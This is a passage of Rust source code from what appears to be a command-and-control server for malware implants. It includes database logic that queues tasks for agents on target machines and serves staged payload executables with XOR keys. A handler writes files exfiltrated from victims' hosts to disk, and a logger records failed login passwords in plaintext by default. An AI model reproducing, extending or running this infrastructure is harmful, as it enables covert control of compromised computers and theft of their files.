            .get_agent_related_db_cfg()
            .await
            .expect("could not load agent related config from the database");

        // Add any listener URIs specified in the profile(s)
        add_listeners_from_profiles(&mut c2_endpoints, &profile);
        add_tokens_from_profiles(&mut agent_tokens, &profile);

        let endpoints = Endpoints {
            c2_endpoints,
            download_endpoints,
        };

        Self {
            db_pool,
            connected_agents: Arc::new(AgentList::default()),
            endpoints: RwLock::new(endpoints),
            agent_tokens: RwLock::new(agent_tokens),
            profile: RwLock::new(profile),
            sessions: Arc::new(Mutex::new(HashMap::new())),
        }
    }

    /// Spawns a background task which prunes expired operator sessions every 60 seconds.
    pub fn track_sessions(&self) {
        let sessions = self.sessions.clone();
        tokio::spawn(async move {
            loop {
                let now = Instant::now();
                {
                    let mut lock = sessions.lock().await;
                    lock.retain(|_, created| now.duration_since(*created) < COOKIE_TTL);
                }

                sleep(Duration::from_secs(60)).await;
            }
        });
    }

    /// Creates, stores, and returns a new unique 1024-character alphanumeric session key.
    pub async fn create_session_key(&self) -> String {
        let mut lock = self.sessions.lock().await;

        // Loop until we generate a unique key (1024 alphanumeric character space) which
        // is not already in the store. The stable `entry` API replaces the previous
        // nightly-only `HashMap::try_insert`.
        loop {
            let key: String = rand::rng()
                .sample_iter(&Alphanumeric)
                .take(1024)
                .map(char::from)
                .collect();

            if let std::collections::hash_map::Entry::Vacant(slot) = lock.entry(key.clone()) {
                slot.insert(Instant::now());
                break key;
            }
        }
    }

    /// Determines whether the presented `key` is valid in the current sessions on
    /// the server.
    pub async fn has_session(&self, key: &str) -> bool {
        let lock = self.sessions.lock().await;

        // The cookie is client-controlled; a missing `session=` prefix previously
        // panicked via `.expect`. Treat a malformed cookie as simply not a session.
        match key.strip_prefix("session=") {
            Some(key) => lock.contains_key(key),
            None => false,
        }
    }

    /// Removes the session for `key`, if present. A malformed cookie is a no-op
    /// rather than a panic, as the value is client-controlled.
    pub async fn remove_session(&self, key: &str) {
        let mut lock = self.sessions.lock().await;

        if let Some(key) = key.strip_prefix("session=") {
            let _ = lock.remove(key);
        }
    }
}

/// Continually monitors for when an agent hasn't checked in after an appropriate period and will automatically remove
/// it from the list of live agents.
pub async fn detect_stale_agents(state: Arc<AppState>) {
    /// How long the loop sleeps between staleness sweeps.
    const LOOP_SLEEP_SECONDS: u64 = 10;

    loop {
        state.connected_agents.mark_agents_stale().await;
        tokio::time::sleep(Duration::from_secs(LOOP_SLEEP_SECONDS)).await;
    }
}


================================================
FILE: c2/src/db.rs
================================================
//! All database related functions

use std::{
    collections::{HashMap, HashSet},
    env,
    time::Duration,
};

use chrono::{DateTime, Utc};
use shared::tasks::{Command, FirstRunData, NewAgentStaging, Task};
use shared_c2_client::{NotificationsForAgents, StagedResourceData};
use sqlx::{Pool, Postgres, Row, migrate::Migrator, postgres::PgPoolOptions};

use crate::{
    agents::Agent,
    app_state::DownloadEndpointData,
    logging::{print_failed, print_info, print_success},
};

/// Maximum number of simultaneous connections held by the Postgres pool.
const MAX_DB_CONNECTIONS: u32 = 30;
/// How long to wait for a free pool connection before erroring.
const DB_ACQUIRE_TIMEOUT_SECS: u64 = 3;
/// Per-connection Postgres `statement_timeout`, in milliseconds.
const DB_STATEMENT_TIMEOUT_MS: u64 = 30_000;
/// Migrations embedded from `./migrations` at compile time, run at startup.
static MIGRATOR: Migrator = sqlx::migrate!("./migrations");

/// Thin wrapper around the Postgres connection pool; all database queries hang off this type.
pub struct Db {
    // Shared sqlx pool; cheap to clone internally via the pool's own Arc.
    pool: Pool<Postgres>,
}

impl Db {
    /// Establish the connection to the Postgres db
    pub async fn new() -> Self {
        let db_string = format!(
            "postgres://{}:{}@{}/{}",
            env::var("POSTGRES_USER").expect("could not find POSTGRES_USER"),
            env::var("POSTGRES_PASSWORD").expect("could not find POSTGRES_PASSWORD"),
            env::var("POSTGRES_HOST").expect("could not find POSTGRES_HOST"),
            env::var("POSTGRES_DB").expect("could not find POSTGRES_DB")
        );

        print_info(format!("Connecting to database..."));

        let pool = PgPoolOptions::new()
            .max_connections(MAX_DB_CONNECTIONS)
            .acquire_timeout(Duration::from_secs(DB_ACQUIRE_TIMEOUT_SECS))
            .after_connect(|conn, _meta| {
                Box::pin(async move {
                    let stmt = format!("SET statement_timeout = {}", DB_STATEMENT_TIMEOUT_MS);
                    sqlx::query(&stmt).execute(conn).await?;
                    Ok(())
                })
            })
            .connect(&db_string)
            .await
            .map_err(|e| {
                let msg = format!("Could not establish a database connection. {e}");
                print_failed(&msg);
                panic!("Could not establish a database connection. {e}");
            })
            .expect("could not setup PgPoolOptions");

        if let Err(e) = MIGRATOR.run(&pool).await {
            print_failed(&format!("Could not run db migrations. {e}"));
            panic!("Could not run db migrations. {e}");
        }

        print_success("Db connection established");

        Self { pool }
    }

    // ************* DATABASE QUERIES

    /// Get an `Agent` from the db by its id and retrieves any tasks that are pending for
    /// the agent.
    ///
    /// The returned `Agent`'s `last_checkin_time` is `Utc::now()` rather than a stored
    /// value, and `first_run_data` is taken from the caller-supplied `frd`.
    ///
    /// # Errors
    /// Propagates `sqlx::Error`, including `RowNotFound` when no agent row has `uid = id`.
    pub async fn get_agent_with_tasks_by_id(
        &self,
        id: &str,
        frd: FirstRunData,
    ) -> Result<(Agent, Option<Vec<Task>>), sqlx::Error> {
        // Get the agent
        let row = sqlx::query(
            r#"
            SELECT uid, sleep
            FROM agents
            WHERE uid = $1"#,
        )
        .bind(id)
        .fetch_one(&self.pool)
        .await?;

        let sleep: i64 = row.try_get("sleep")?;
        // NOTE(review): a negative stored `sleep` would wrap to a huge u64 here -
        // presumably the column is only ever written from unsigned values; confirm.
        let sleep = sleep as u64;

        // Strictly speaking this isn't coming from the DB, but the time will close enough within
        // a reasonable degree of error.
        let last_check_in: DateTime<Utc> = Utc::now();

        // Get any tasks
        let tasks = self.get_tasks_for_agent_by_uid(id).await?;

        Ok((
            Agent {
                uid: id.to_string(),
                sleep,
                first_run_data: frd,
                last_checkin_time: last_check_in,
                is_stale: false,
            },
            tasks,
        ))
    }

    /// Atomically claims (marks `fetched`) and returns all unfetched tasks for an agent.
    ///
    /// Tasks whose command is auto-completable are marked completed and copied to the
    /// `completed_tasks` table on the way out, since the agent never posts a result
    /// back for them.
    ///
    /// # Returns
    /// - `Ok(None)` when the agent has no pending tasks.
    /// - `Ok(Some(tasks))` sorted ascending by task id.
    pub async fn get_tasks_for_agent_by_uid(
        &self,
        uid: &str,
    ) -> Result<Option<Vec<Task>>, sqlx::Error> {
        let rows = sqlx::query(
            r#"
            UPDATE tasks
            SET fetched = TRUE
            WHERE id IN (
                SELECT id
                FROM tasks
                WHERE agent_id = $1
                    AND fetched IS NOT TRUE
                ORDER BY id ASC
                FOR UPDATE SKIP LOCKED
            )
            RETURNING id, command_id, data
            "#,
        )
        .bind(uid)
        .fetch_all(&self.pool)
        .await?;

        if rows.is_empty() {
            return Ok(None);
        }

        let mut tasks: Vec<Task> = Vec::new();

        for row in rows {
            let task_id: i32 = row.try_get("id")?;
            let command_id: i32 = row.try_get("command_id")?;
            let metadata: Option<String> = row.try_get("data")?;

            let command = Command::from_u32(command_id as _);

            let task = Task::from(task_id, command, metadata);

            // As we are pulling tasks from the db to send back to the client; we want to make sure
            // at this point we mark any tasks as complete which are auto-completable that don't require
            // a response posted back to us. Database errors are propagated with `?`
            // rather than panicking (`expect`) - a transient failure should surface to
            // the caller, not take the server down.
            if command.is_autocomplete() {
                self.mark_task_completed(&task).await?;
                self.add_completed_task(&task, uid).await?;
            }

            tasks.push(task);
        }

        // RETURNING does not guarantee row order, so sort explicitly.
        tasks.sort_by_key(|task| task.id);

        Ok(Some(tasks))
    }

    /// Inserts a brand-new agent row (uid + initial sleep) and returns the in-memory `Agent`.
    pub async fn insert_new_agent(
        &self,
        id: &str,
        frd: FirstRunData,
    ) -> Result<Agent, sqlx::Error> {
        let _ = sqlx::query(
            "INSERT into agents (uid, sleep)
            VALUES ($1, $2)",
        )
        .bind(id)
        .bind(frd.e as i64)
        .execute(&self.pool)
        .await?;

        // The check-in time is "now" by definition: the agent is connecting as we insert it.
        Ok(Agent {
            uid: id.to_string(),
            sleep: frd.e,
            first_run_data: frd,
            last_checkin_time: Utc::now(),
            is_stale: false,
        })
    }

    /// Queues a new task for an agent, returning the new task's database id.
    ///
    /// # Errors
    /// Propagates `sqlx::Error` from the insert, or when the returned row's `id`
    /// column is missing / cannot be decoded.
    pub async fn add_task_for_agent_by_id(
        &self,
        uid: &String,
        command: Command,
        metadata: Option<String>,
    ) -> Result<i32, sqlx::Error> {
        let row = sqlx::query(
            r#"
            INSERT into tasks (command_id, data, agent_id, fetched)
            VALUES ($1, $2, $3, FALSE)
            RETURNING id"#,
        )
        .bind(command as i32)
        .bind(metadata)
        .bind(uid)
        .fetch_one(&self.pool)
        .await?;

        // try_get propagates a decode/column error instead of panicking like `get`.
        let id: i32 = row.try_get("id")?;

        Ok(id)
    }

    /// Persists a new sleep value for the given agent.
    pub async fn update_agent_sleep_time(
        &self,
        uid: &String,
        metadata: i64,
    ) -> Result<(), sqlx::Error> {
        sqlx::query(
            "UPDATE agents
            SET sleep = $1
            WHERE uid = $2",
        )
        .bind(metadata)
        .bind(uid)
        .execute(&self.pool)
        .await
        .map(|_| ())
    }

    /// Sets a task to completed in the db
    pub async fn mark_task_completed(&self, task: &Task) -> Result<(), sqlx::Error> {
        sqlx::query(
            r#"
            UPDATE tasks
            SET completed = TRUE
            WHERE id = $1
        "#,
        )
        .bind(task.id)
        .execute(&self.pool)
        .await
        .map(|_| ())
    }

    /// Adds a completed task into the `completed_tasks` table which stores the results
    /// and metadata associated with completed task results, to be used by the client.
    pub async fn add_completed_task(&self, task: &Task, agent_id: &str) -> Result<(), sqlx::Error> {
        // The command discriminant is stored in a signed 32-bit column.
        let command_id: u32 = task.command.into();

        let query = sqlx::query(
            r#"
            INSERT INTO completed_tasks (task_id, result, time_completed_ms, agent_id, command_id)
            VALUES ($1, $2, $3, $4, $5)
        "#,
        )
        .bind(task.id)
        .bind(task.metadata.as_deref())
        .bind(task.completed_time)
        .bind(agent_id)
        .bind(command_id as i32);

        query.execute(&self.pool).await.map(|_| ())
    }

    /// Db query that looks whether an agent by its UID has any pending notifications
    /// that have not been polled by the client.
    ///
    /// # Errors
    /// Propagates database failures. (Previously every error - not just `RowNotFound` -
    /// was silently collapsed into `Ok(false)`, masking real connectivity problems.)
    pub async fn agent_has_pending_notifications(&self, uid: &String) -> Result<bool, sqlx::Error> {
        // fetch_optional maps "no matching row" to None directly, removing the need to
        // special-case sqlx::Error::RowNotFound.
        let row = sqlx::query(
            r#"
            SELECT ct.id
            FROM completed_tasks ct
            WHERE
                ct.agent_id = $1
                AND ct.client_pulled_update = FALSE
                AND ct.command_id IS NOT NULL
            LIMIT 1
        "#,
        )
        .bind(uid)
        .fetch_optional(&self.pool)
        .await?;

        Ok(row.is_some())
    }

    /// Atomically claims (sets `client_pulled_update`) and returns all completed-task
    /// notifications for an agent which the operator client has not yet pulled.
    ///
    /// The CTE selects pending rows with `FOR UPDATE SKIP LOCKED` so concurrent pulls
    /// do not hand the same notification to two callers.
    ///
    /// # Returns
    /// - `Ok(None)` when nothing is pending.
    /// - `Ok(Some(rows))` sorted ascending by `task_id`.
    pub async fn pull_notifications_for_agent(
        &self,
        uid: &String,
    ) -> Result<Option<NotificationsForAgents>, sqlx::Error> {
        let mut rows: NotificationsForAgents = sqlx::query_as(
            r#"
            WITH pending AS (
                SELECT id
                FROM completed_tasks
                WHERE
                    client_pulled_update = FALSE
                    AND agent_id = $1
                    AND command_id IS NOT NULL
                ORDER BY task_id ASC
                FOR UPDATE SKIP LOCKED
            )
            UPDATE completed_tasks ct
            SET client_pulled_update = TRUE
            FROM pending
            WHERE ct.id = pending.id
            RETURNING
                ct.id AS completed_id,
                ct.task_id,
                ct.command_id,
                ct.agent_id,
                ct.result,
                ct.time_completed_ms
        "#,
        )
        .bind(uid)
        .fetch_all(&self.pool)
        .await?;

        if rows.is_empty() {
            return Ok(None);
        }

        // Re-sort client-side; RETURNING row order is not guaranteed by the database.
        rows.sort_by_key(|row| row.task_id);

        Ok(Some(rows))
    }

    /// Updates the agents last check-in time, both in the database, and the in memory copy of the agent.
    pub async fn update_agent_checkin_time(&self, agent: &mut Agent) -> Result<(), sqlx::Error> {
        // Update the in memory representation of the agent's last check-in
        agent.last_checkin_time = Utc::now();

        // We will use PG inbuilt now() function to keep types happy
        sqlx::query(
            r#"
            UPDATE agents
            SET last_check_in = now()
            WHERE uid = $1
            "#,
        )
        .bind(&agent.uid)
        .execute(&self.pool)
        .await
        .map(|_| ())
    }

    // pub async fn get_agent_last_check_in(&self, uid: &str) -> Result<DateTime<Utc>, sqlx::Error> {
    //     let row = sqlx::query(
    //         r#"
    //         SELECT last_check_in
    //         FROM agents
    //         WHERE uid = $1
    //         "#,
    //     )
    //     .bind(uid)
    //     .fetch_one(&self.pool)
    //     .await?;

    //     let last_check_in: DateTime<Utc> = row.try_get("last_check_in")?;

    //     Ok(last_check_in)
    // }

    /// Inserts a newly staged agent build (as produced by the creation wizard) into
    /// the `agent_staging` table.
    pub async fn add_staged_agent(&self, data: &NewAgentStaging) -> Result<(), sqlx::Error> {
        // As we are using this as a u8, and we cannot store it in the db as a u8 for some reason (?)
        // we will cast it to an i16 for storage, so we can safely convert back to a u8 without causing
        // undefined behaviour with an int overflow.
        // NOTE(review): `data.port as i16` would wrap negative for port values above
        // i16::MAX - presumably the wizard constrains the accepted range; confirm.
        // NOTE(review): indexing `c2_endpoints[0]` panics if the vec is empty, and any
        // additional endpoints are silently dropped - assumed validated upstream.

        let _ = sqlx::query(
            "INSERT into agent_staging 
                (agent_name, host, c2_endpoint, staged_endpoint, sleep_time, pe_name, port, security_token)
            VALUES 
                ($1, $2, $3, $4, $5, $6, $7, $8)
            ",
        )
        .bind(&data.implant_name)
        .bind(&data.c2_address)
        .bind(&data.c2_endpoints[0])
        .bind(&data.staging_endpoint)
        .bind(data.default_sleep_time)
        .bind(&data.pe_name)
        .bind(data.port as i16)
        .bind(&data.agent_security_token)
        .execute(&self.pool)
        .await?;

        Ok(())
    }

    /// Deletes the database row relating to a staged resource.
    ///
    /// # Returns
    /// A `string` containing the file name on the local disk of the server.
    ///
    /// # Errors
    /// Returns `sqlx::Error::RowNotFound` when no staged resource matches the URI.
    pub async fn delete_staged_resource_by_uri(
        &self,
        download_url: &str,
    ) -> Result<String, sqlx::Error> {
        // Delete and fetch the on-disk file name in a single statement: the previous
        // SELECT-then-DELETE pair could race with a concurrent delete of the same row.
        let row = sqlx::query(
            "DELETE FROM agent_staging 
            WHERE staged_endpoint = $1
            RETURNING pe_name",
        )
        .bind(download_url)
        .fetch_one(&self.pool)
        .await?;

        let file_name: String = row.try_get("pe_name")?;

        Ok(file_name)
    }

    /// Queries the database to get URI information around routes available for agents where
    /// the operator has configured the C2 to use them, as well as staged downloads.
    ///
    /// # Returns
    /// On success returns a tuple:
    ///
    /// - `HashSet<String>` containing the URIs that are permitted for c2 check-in
    /// - `HashMap<String, DownloadEndpointData>` containing the URI's (key) and download metadata (value) for staged downloads
    /// - `HashSet<String>` containing the security tokens valid for agents to connect to the C2
    pub async fn get_agent_related_db_cfg(
        &self,
    ) -> Result<
        (
            HashSet<String>,
            HashMap<String, DownloadEndpointData>,
            HashSet<String>,
        ),
        sqlx::Error,
    > {
        let mut check_in_uris: HashSet<String> = HashSet::new();
        let mut security_tokens: HashSet<String> = HashSet::new();
        let mut staged_downloads: HashMap<String, DownloadEndpointData> = HashMap::new();

        let rows = sqlx::query(
            r#"
            SELECT c2_endpoint, staged_endpoint, pe_name, security_token, agent_name, xor_key
            FROM agent_staging"#,
        )
        .fetch_all(&self.pool)
        .await?;

        // An empty result set simply falls through the loop and returns the empty
        // collections - no early return needed.
        for row in rows {
            let c2_endpoint: String = row.try_get("c2_endpoint")?;
            let staged_endpoint: String = row.try_get("staged_endpoint")?;
            let pe_name: String = row.try_get("pe_name")?;
            let agent_security_token: String = row.try_get("security_token")?;
            let agent_name: String = row.try_get("agent_name")?;
            let xor_key: Option<u8> = {
                let k: i16 = row.try_get("xor_key")?;
                // Cast is safe - we only ever accept a u8 on the frontend so we wont
                // experience any undefined behaviour in respect of integer underflow.
                // A stored key of 0 means "no XOR applied".
                if k == 0 { None } else { Some(k as u8) }
            };

            check_in_uris.insert(c2_endpoint);
            staged_downloads.insert(
                staged_endpoint,
                DownloadEndpointData::new(&pe_name, &agent_name, xor_key),
            );
            security_tokens.insert(agent_security_token);
        }

        Ok((check_in_uris, staged_downloads, security_tokens))
    }

    /// Attempts to lookup an operator - at the moment this only supports SINGLE OPERATOR operations
    /// so when we make the lookup, we are looking for 1 and only 1 row. We are NOT searching by username
    /// right now.
    ///
    /// # Returns
    /// Some - (`db_username`, `password_hash`, `salt`) of the row
    /// None - if the operator could not be found
    pub async fn lookup_operator(
        &self,
        _username: &str,
    ) -> Result<Option<(String, String, String)>, sqlx::Error> {
        // fetch_optional makes the documented `None` contract real: with fetch_one an
        // empty table surfaced as Err(RowNotFound), and the old `row.is_empty()` check
        // (which tests columns, not rows) could never signal a missing operator.
        let Some(row) = sqlx::query(
            r#"
            SELECT username, password_hash, salt
            FROM operators"#,
        )
        .fetch_optional(&self.pool)
        .await?
        else {
            return Ok(None);
        };

        let db_username: String = row.try_get("username")?;
        let password_hash: String = row.try_get("password_hash")?;
        let salt: String = row.try_get("salt")?;

        Ok(Some((db_username, password_hash, salt)))
    }

    /// Inserts the single operator credential set (username, password hash, salt).
    ///
    /// # Panics
    /// Panics if an operator row already exists - multi-operator support is not
    /// implemented, so a second registration is treated as a misconfiguration.
    pub async fn add_operator(
        &self,
        username: &str,
        pw_hash: &str,
        salt_hash: &str,
    ) -> Result<(), sqlx::Error> {
        // NOTE(review): a lookup *error* is silently ignored by the `if let Ok`, which
        // would allow the insert to proceed even when the existence check failed.
        if let Ok(result) = self.lookup_operator("").await
            && result.is_some()
        {
            panic!("You are trying to add another operator and that is forbidden right now.");
        }

        let _ = sqlx::query(
            "INSERT into operators 
                (username, password_hash, salt)
            VALUES 
                ($1, $2, $3)
            ",
        )
        .bind(username)
        .bind(pw_hash)
        .bind(salt_hash)
        .execute(&self.pool)
        .await?;

        Ok(())
    }

    /// Fetches every staged resource row, for display to the operator client.
    pub async fn get_staged_agent_data(&self) -> Result<Vec<StagedResourceData>, sqlx::Error> {
        sqlx::query_as::<_, StagedResourceData>(
            r#"
            SELECT agent_name, c2_endpoint, staged_endpoint, pe_name, sleep_time, port, num_downloads
            FROM agent_staging"#,
        )
        .fetch_all(&self.pool)
        .await
    }

    /// Collects every completed task for an agent, for export by the client.
    ///
    /// Returns `Ok(None)` when the agent has no completed tasks on record.
    pub async fn get_agent_export_data(&self, uid: &str) -> Result<Option<Vec<Task>>, sqlx::Error> {
        let rows = sqlx::query(
            r#"
            SELECT task_id, result, time_completed_ms, command_id
            FROM completed_tasks
            WHERE agent_id = $1"#,
        )
        .bind(uid)
        .fetch_all(&self.pool)
        .await?;

        if rows.is_empty() {
            return Ok(None);
        }

        let mut exported = Vec::with_capacity(rows.len());

        for row in &rows {
            let command_id: i32 = row.try_get("command_id")?;

            exported.push(Task {
                id: row.try_get("task_id")?,
                command: Command::from_u32(command_id as _),
                completed_time: row.try_get("time_completed_ms")?,
                metadata: row.try_get("result")?,
            });
        }

        Ok(Some(exported))
    }

    /// Increments the download counter for the staged resource at `staged_endpoint`.
    pub async fn update_download_count(&self, staged_endpoint: &String) -> Result<(), sqlx::Error> {
        sqlx::query(
            "UPDATE agent_staging
            SET num_downloads = num_downloads + 1
            WHERE staged_endpoint = $1",
        )
        .bind(staged_endpoint)
        .execute(&self.pool)
        .await
        .map(|_| ())
    }
}


================================================
FILE: c2/src/exfil.rs
================================================
use std::path::PathBuf;

use shared::tasks::{ExfiltratedFile, Task};
use tokio::io::AsyncWriteExt;

use crate::{EXFIL_PATH, logging::log_error_async};

/// Handles an exfiltrated file from the targets machine by saving it to disk on the
/// c2 under the path c2/<hostname><path as per target machine>
///
/// NOTE(review): the first two statements unconditionally clear `task.metadata`
/// and return, so everything below them is dead code. It appears this handler
/// was deliberately disabled in favour of `handle_exfiltrated_file_stream`,
/// which contains the same logic - confirm before deleting or re-enabling the
/// body below.
pub async fn handle_exfiltrated_file(task: &mut Task) {
    // Disabled: drop the payload so it is never persisted, then bail.
    task.metadata = None;
    return;

    // ---- DEAD CODE from here down (see NOTE above) ----
    if let Some(ser) = &task.metadata {
        let ef = match serde_json::from_str::<ExfiltratedFile>(ser) {
            Ok(ef) => ef,
            Err(e) => {
                // If we got an error extracting as an ExfiltratedFile, try extract as string which
                // will contain an error from the target system.
                if let Ok(_) = serde_json::from_str::<String>(ser) {
                    // Let the client deal with the error message
                    return;
                }

                log_error_async(&format!(
                    "Failed to deserialise data from exfiltrated file. {e}. Got: {:?}",
                    task.metadata
                ))
                .await;
                task.metadata = None;
                return;
            }
        };

        //
        // Construct the save path - we cannot save with C:\ in the name, so we strip this. Any other drive letter
        // should be fine (I think)
        //
        let mut save_path = String::from(EXFIL_PATH);
        save_path.push('/');
        save_path.push_str(&ef.hostname);
        save_path.push('/');
        save_path.push_str(&ef.file_path);
        let save_path = save_path.replace(r"C:\", "");
        let save_path = save_path.replace("\\", "/");

        //
        // Ensure the directory is created for the file
        //
        // `pop` strips the filename so only the parent directory is created.
        let mut path_as_path = PathBuf::from(&save_path);
        path_as_path.pop();
        if let Err(e) = tokio::fs::create_dir_all(path_as_path).await {
            log_error_async(&format!(
                "Failed to create folder for exfiltrated file. {e}"
            ))
            .await;
            task.metadata = None;
            return;
        };

        //
        // Create and write the file
        //
        let f = tokio::fs::File::options()
            .create(true)
            .write(true)
            .truncate(true)
            .open(&save_path)
            .await;

        let mut f = match f {
            Ok(f) => f,
            Err(e) => {
                log_error_async(&format!("Failed to create file after exfil. {e}")).await;

                task.metadata = None;
                return;
            }
        };

        if let Err(e) = f.write_all(&ef.file_data).await {
            log_error_async(&format!("Failed to write exfiltrated file data. {e}")).await;
        };
    }

    // Finally, remove the enclosed vec - we do not want to store this result in the db
    task.metadata = None;
}

/// Handles an exfiltrated file from the targets machine by saving it to disk on the
/// c2 under the path c2/<hostname><path as per target machine>
///
/// On failure the error is logged on the C2; in all paths `task.metadata` is
/// cleared before returning so the raw file bytes are never stored in the db.
/// The one exception is when the metadata deserialises as a plain string (an
/// error message from the target), which is left for the client to report.
pub async fn handle_exfiltrated_file_stream(task: &mut Task) {
    if let Some(ser) = &task.metadata {
        let ef = match serde_json::from_str::<ExfiltratedFile>(ser) {
            Ok(ef) => ef,
            Err(e) => {
                // If we got an error extracting as an ExfiltratedFile, try extract as string which
                // will contain an error from the target system.
                if serde_json::from_str::<String>(ser).is_ok() {
                    // Let the client deal with the error message
                    return;
                }

                log_error_async(&format!(
                    "Failed to deserialise data from exfiltrated file. {e}. Got: {:?}",
                    task.metadata
                ))
                .await;
                task.metadata = None;
                return;
            }
        };

        //
        // Construct the save path - we cannot save with C:\ in the name, so we strip this. Any other drive letter
        // should be fine (I think)
        //
        // SECURITY NOTE(review): `ef.hostname` and `ef.file_path` originate from
        // the target machine; a tampered agent could embed `..` path components
        // to escape EXFIL_PATH. Consider sanitising each path segment before
        // trusting it.
        let mut save_path = String::from(EXFIL_PATH);
        save_path.push('/');
        save_path.push_str(&ef.hostname);
        save_path.push('/');
        save_path.push_str(&ef.file_path);
        let save_path = save_path.replace(r"C:\", "");
        let save_path = save_path.replace("\\", "/");

        //
        // Ensure the directory is created for the file
        //
        // `pop` strips the filename so only the parent directory is created.
        let mut path_as_path = PathBuf::from(&save_path);
        path_as_path.pop();
        if let Err(e) = tokio::fs::create_dir_all(path_as_path).await {
            log_error_async(&format!(
                "Failed to create folder for exfiltrated file. {e}"
            ))
            .await;
            task.metadata = None;
            return;
        };

        //
        // Create and write the file
        //
        let f = tokio::fs::File::options()
            .create(true)
            .write(true)
            .truncate(true)
            .open(&save_path)
            .await;

        let mut f = match f {
            Ok(f) => f,
            Err(e) => {
                log_error_async(&format!("Failed to create file after exfil. {e}")).await;

                task.metadata = None;
                return;
            }
        };

        if let Err(e) = f.write_all(&ef.file_data).await {
            log_error_async(&format!("Failed to write exfiltrated file data. {e}")).await;
        };
    }

    // Finally, remove the enclosed vec - we do not want to store this result in the db
    task.metadata = None;
}


================================================
FILE: c2/src/logging.rs
================================================
use std::{env, fmt::Display, io::Write, path::PathBuf};

use chrono::{SecondsFormat, Utc};
use tokio::io::AsyncWriteExt;

use crate::{ACCESS_LOG, DOWNLOAD, ERROR_LOG, LOG_PATH, LOGIN_LOG};

/// Record that a staged-download URI was fetched, tagging the requester's address.
pub async fn log_download_accessed(uri: &str, addr: &str) {
    let log_file = {
        let mut p = PathBuf::from(LOG_PATH);
        p.push(DOWNLOAD);
        p
    };

    log(&log_file, &format!("Download accessed: /{uri}."), Some(addr)).await;
}

pub async fn log_page_accessed_no_auth(uri: &str, addr: &str) {
    if let Ok(v) = env::var("DISABLE_ACCESS_LOG") {
        if v == "1" {
            return;
        }
    }

    let mut path = PathBuf::from(LOG_PATH);
    path.push(ACCESS_LOG);

    let msg = format!("Unauthenticated request at: /{uri}.");

    log(&path, &msg, Some(addr)).await;
}

pub async fn log_page_accessed_auth(uri: &str, addr: &str) {
    if let Ok(v) = env::var("DISABLE_ACCESS_LOG")
        && v == "1"
    {
        return;
    }

    let mut path = PathBuf::from(LOG_PATH);
    path.push(ACCESS_LOG);

    let msg = format!("Authenticated request at: /{uri}.");

    log(&path, &msg, Some(addr)).await;
}

/// Record an admin login attempt in the login log.
///
/// Behaviour matrix:
/// - `DISABLE_LOGIN_LOG=1` suppresses this log entirely.
/// - Repeat attempts from an IP already present in the log are recorded without
///   the password (reduces log growth from brute forcing).
/// - A FAILED attempt from a previously-unseen IP logs the submitted password
///   in PLAINTEXT unless `DISABLE_PLAINTXT_PW_BAD_LOGIN=1` is set - operators
///   should be aware this log can contain sensitive credential material.
/// - Successful logins never record the password.
pub async fn log_admin_login_attempt(username: &str, password: &str, ip: &str, success: bool) {
    if let Ok(v) = env::var("DISABLE_LOGIN_LOG")
        && v == "1"
    {
        return;
    }

    let mut path = PathBuf::from(LOG_PATH);
    path.push(LOGIN_LOG);

    // check if IP is unique, for size concerns only log those
    // NOTE(review): this reads the whole login log into memory on every attempt;
    // fine while the log stays small, worth revisiting if it grows.
    let r = tokio::fs::read_to_string(&path).await.unwrap_or_default();
    let msg = if r.contains(ip) && success {
        format!("Login true. Username: {username}, Password: [REDACTED].")
    } else if r.contains(ip) && !success {
        format!("[REPEAT ATTEMPT] Login {success}. Username: {username}, Password: REDACTED.")
    } else if !success {
        if let Ok(v) = env::var("DISABLE_PLAINTXT_PW_BAD_LOGIN") {
            if v == "1" {
                format!("Login {success}. Username: {username}, Password: [REDACTED].")
            } else {
                format!("Login {success}. Username: {username}, Password: {password}.")
            }
        } else {
            format!("Login {success}. Username: {username}, Password: {password}.")
        }
    } else {
        format!("Login {success}. Username: {username}, Password: [REDACTED].")
    };

    log(&path, &msg, Some(ip)).await;
}

/// Synchronously append `message` to the error log. Prefer [`log_error_async`]
/// from async contexts.
pub fn log_error(message: &str) {
    let mut error_log = PathBuf::from(LOG_PATH);
    error_log.push(ERROR_LOG);
    log_sync(&error_log, message, None);
}

/// Append `message` to the error log without blocking the async runtime.
pub async fn log_error_async(message: &str) {
    let mut error_log = PathBuf::from(LOG_PATH);
    error_log.push(ERROR_LOG);

    log(&error_log, message, None).await
}

/// An internal function to log an event to a given log file.
///
/// This function takes care of adding the date and IP to the log for consistency, and also appends
/// a newline at the end of the line.
///
/// Logging is best-effort: a failure to open the file is silently ignored.
async fn log(path: &PathBuf, message: &str, addr: Option<&str>) {
    let file = tokio::fs::OpenOptions::new()
        .read(true)
        .append(true)
        .open(path)
        .await;

    let message = construct_msg(addr, message);

    if let Ok(mut file) = file {
        // `write_all` rather than `write`: a bare `write` may perform a short
        // write and silently drop the tail of the log line.
        let _ = file.write_all(message.as_bytes()).await;
    }
}

/// Synchronous sibling of [`log`], for callers that are not async.
///
/// Logging is best-effort: a failure to open the file is silently ignored.
fn log_sync(path: &PathBuf, message: &str, addr: Option<&str>) {
    let msg = construct_msg(addr, message);

    let file = std::fs::OpenOptions::new()
        .read(true)
        .append(true)
        .open(path);

    if let Ok(mut file) = file {
        // `write_all` rather than `write`: a bare `write` may perform a short
        // write and silently drop the tail of the log line.
        let _ = file.write_all(msg.as_bytes());
    }
}

/// Prefix `message` with a second-precision RFC 3339 UTC timestamp and, when
/// given, the source IP; the returned line is newline-terminated.
fn construct_msg(ip: Option<&str>, message: &str) -> String {
    let time_now = Utc::now().to_rfc3339_opts(SecondsFormat::Secs, true);

    match ip {
        Some(ip) => format!("[{time_now}] [{ip}] {message}\n"),
        None => format!("[{time_now}] {message}\n"),
    }
}

/// Create the named log file under `LOG_PATH` if it does not already exist.
///
/// An `AlreadyExists` error is silently accepted (the common case); any other
/// I/O error panics, since the server cannot run without its log files.
#[macro_export]
macro_rules! ensure_log_file_on_disk {
    ($filename:expr) => {{
        use crate::LOG_PATH;

        let mut log_path = std::path::PathBuf::from(LOG_PATH);
        log_path.push($filename);
        // `create_new` fails when the file exists, which is benign here.
        if let Err(e) = std::fs::File::create_new(&log_path) {
            match e.kind() {
                std::io::ErrorKind::AlreadyExists => (),
                _ => {
                    panic!("Cannot create log for {}", $filename);
                }
            }
        }
    }};
}

/// Create the given directory if it does not already exist.
///
/// An `AlreadyExists` error is silently accepted; any other I/O error panics,
/// since the server's on-disk layout is required at startup.
#[macro_export]
macro_rules! create_dir {
    ($dir_path:expr) => {{
        if let Err(e) = std::fs::create_dir($dir_path) {
            match e.kind() {
